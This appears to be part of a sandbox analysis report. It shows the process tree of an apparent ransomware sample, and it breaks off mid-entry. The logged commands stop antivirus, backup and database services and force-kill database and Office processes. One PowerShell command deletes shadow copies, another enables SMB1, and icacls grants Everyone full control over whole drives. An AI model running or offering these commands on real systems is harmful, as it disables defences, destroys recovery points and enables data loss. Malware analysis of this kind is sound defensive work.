- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:3840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:1144
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:3864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:7880
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:1724
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:3848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
    3⤵
    PID:6548
- C:\Windows\system32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:3792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop audioendpointbuilder /y
    3⤵
    PID:7268
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:3872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:5460
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:3880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:8052
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:3888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:992
- C:\Windows\system32\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:3896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:7872
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:3904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:2744
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:3912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
    3⤵
    PID:8012
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:3920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:5252
- C:\Windows\system32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:3928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:7924
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:3944
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:6720
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:6676
- C:\Windows\system32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:4024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:2868
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:4032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
    3⤵
    PID:6696
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:4040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:5612
- C:\Windows\system32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:4056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Symantec System Recovery” /y
    3⤵
    PID:5756
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:4064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
    3⤵
    PID:6732
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:4148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:6704
- C:\Windows\system32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:4132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:6764
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:4156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Health Service” /y
    3⤵
    PID:6956
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:4124
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:6792
- C:\Windows\system32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:4108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:7016
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:4100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:6756
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:4088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
    3⤵
    PID:6740
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:4080
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:6748
- C:\Windows\system32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:4072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:5500
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:4236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:6988
- C:\Windows\system32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:4244
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
    3⤵
    PID:6932
- C:\Windows\system32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:4252
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop vapiendpoint /y
    3⤵
    PID:7000
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4260
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4268
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4276
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4284
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4292
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4300
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4316
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4308
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4324
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4332
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4340
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4348
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4356
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4364
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4372
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4388
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:4380
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4396
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4404
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4412
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:4428
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4436
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4444
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4452
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4460
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4476
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4468
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4484
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4540
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4548
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4532
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4524
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4516
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4556
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4508
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4500
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4492
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4564
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4572
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4636
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4628
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4620
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4612
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4604
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4596
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4588
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4580
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4652
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4668
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4676
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4660
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4684
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4692
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4700
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4708
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c net view
  2⤵
  PID:4716
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:1524
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4724
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4748
- C:\Windows\system32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:4756
- C:\Windows\system32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:4772
- C:\Windows\system32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:4780
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:6436
- C:\Windows\system32\net.exe
  "net.exe" use \\10.127.0.255
  2⤵
  PID:3420
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpEE1E.bat
  2⤵
  PID:6608
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:6612
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
  2⤵
  PID:3532
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
  2⤵
  PID:5840
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:6700
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:3936
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:2120
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:6720
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:6648
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Videos\Sample Videos\Wildlife.wmv /grant Everyone:F /T /C /Q
  2⤵
  PID:5848
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv /grant Everyone:F /T /C /Q
  2⤵
  PID:4088
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:6688
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Desert.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:6560
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:6656
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:6736
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Koala.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:4068
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:6692
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:6304
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:4128
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Kalimba.mp3 /grant Everyone:F /T /C /Q
  2⤵
  PID:6784
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 /grant Everyone:F /T /C /Q
  2⤵
  PID:7000
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Sleep Away.mp3 /grant Everyone:F /T /C /Q
  2⤵
  PID:4240
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:2444
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:7016
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:940
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:5112
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:3500
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:4984
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:2668
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:3068
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4928
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:2296
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:5000
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft Help\nslist.hxl /grant Everyone:F /T /C /Q
  2⤵
  PID:2644
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:4952
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\ja-JP\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:2560
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\fr-FR\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:2992
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:2988
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\de-DE\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:4432
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\ja-JP\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:2924
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\ja-JP\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:2872
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\fr-FR\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:2808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\fr-FR\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:2840
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\ja-JP\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:5008
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\ja-JP\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:2960
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\fr-FR\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:6140
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\fr-FR\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:5040
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:1736
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:2516
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:4620
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:7396
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:7384
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:2624
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:6360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:7500
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-07132009-221054.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:7580
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasbase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:2424
- C:\Windows\system32\icacls.exe
